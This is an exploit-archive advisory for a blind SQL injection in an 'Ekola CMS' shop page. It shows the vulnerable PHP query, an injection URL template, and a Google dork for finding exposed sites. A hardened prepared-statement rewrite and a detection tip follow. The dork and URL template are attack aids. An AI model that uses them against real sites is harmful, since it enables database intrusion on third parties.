
Ekola CMS - Blind SQL Injection

Author: The UnKnØwN, Published: 21-09-2012
+-----------------------------------------------------------------------------+
¦ Ekola CMS - Blind SQL Injection ¦ _ ¦ - ¦ x ¦
+-----------------------------------------------------------------------------+
¦ ______ ______ _______ _______ _ _ ¦
¦ (_____ \(_____ (_______) (_______) | | (_) _ ¦
¦ _____) )_____) ) ___ _____ _ _ ____ | | ___ _ _| |_ ¦
¦ | __ /| ____/ | (_ | | ___) ( \ / ) _ \| |/ _ \| (_ _) ¦
¦ | | \ \| | | |___) | | |_____ ) x (| |_| | | |_| | | | |_ ¦
¦ |_| |_|_| \_____/ |_______|_/ \_) __/ \_)___/|_| \__) ¦
+-----------------------------------------------------------------------------+
¦ by The UnKnØwN ¦
+-----------------------------------------------------------------------------+
¦ greets to : KiMgX12 - Fawzi Coldfire - BenzØ - Soka - Hony - Pincki - ¦
¦ Linkce16 - Mooh Splinter - The Spark - F3i ¦
¦ The Crazy3D Team AND all algerian H4x0r$ ¦
+-----------------------------------------------------------------------------+
¦ [+] exploit title : Ekola cms - Blind SQL Injection ¦
¦ [+] date : 11-04-2012 ¦
¦ [+] author : The UnKnØwN ¦
¦ [+] version : 1 ¦
¦ [+] category : webapps ¦
¦ [+] google dork :intext:Eloka CMS © 2011 Design and Code by Nicow. ¦
¦ [+] tested on : windows xp ¦
+-----------------------------------------------------------------------------+
¦ Vulnerability Details ¦
+-----------------------------------------------------------------------------+
¦ Unprotected GET variable in "/pages/acheter.php" ¦

if (isset($_GET['objet']))
{
    $error = FALSE;
    if (!$connect) $error = 1; // check whether the user is logged in
    if (!$error) // check whether the object exists
    {
        // $_GET['objet'] is concatenated into the query unescaped: this is the blind SQL injection point
        $rep = mysql_fetch_array(mysql_query("SELECT ID FROM boutique_objets WHERE ID='".$_GET['objet']."'"));
    }
}


http://site/path/index.php?p=acheter&objet={Inject}&persoSelect=1
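A hardened form of the same lookup, as an added example that is not Ekola CMS code: it assumes an open mysqli connection named $mysqli and the page's $connect login flag, and replaces the removed mysql_* calls with integer validation plus a prepared statement.

```php
<?php
// Hardened rewrite of the acheter.php object lookup (added example, not Ekola CMS code).
// Assumes $mysqli is an open mysqli connection and $connect reflects the login state,
// as in the original snippet; the mysql_* functions it used are removed in PHP 7.
function lookup_objet(mysqli $mysqli, bool $connect, array $get): ?array
{
    if (!isset($get['objet']) || !$connect) {
        return null;
    }
    // The ID column is numeric: reject anything that is not a plain integer
    // before it reaches the database, so quoted strings never touch the query.
    $objet = filter_var($get['objet'], FILTER_VALIDATE_INT);
    if ($objet === false) {
        return null;
    }
    // Even with validated input, bind the value instead of concatenating it:
    // query text and parameter travel separately, so the value cannot alter
    // the statement's structure and the blind-injection channel is closed.
    $stmt = $mysqli->prepare("SELECT ID FROM boutique_objets WHERE ID = ?");
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param("i", $objet);
    $stmt->execute();
    $stmt->bind_result($id);
    $found = $stmt->fetch();
    $stmt->close();
    return $found ? ['ID' => $id] : null;
}
```

Logging rejected values of `objet` (non-integer input from a logged-in session) gives a cheap detection signal for probing of this parameter.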



¦ Note : You must be connected ¦
+-----------------------------------------------------------------------------+
¦ End ¦
+-----------------------------------------------------------------------------+
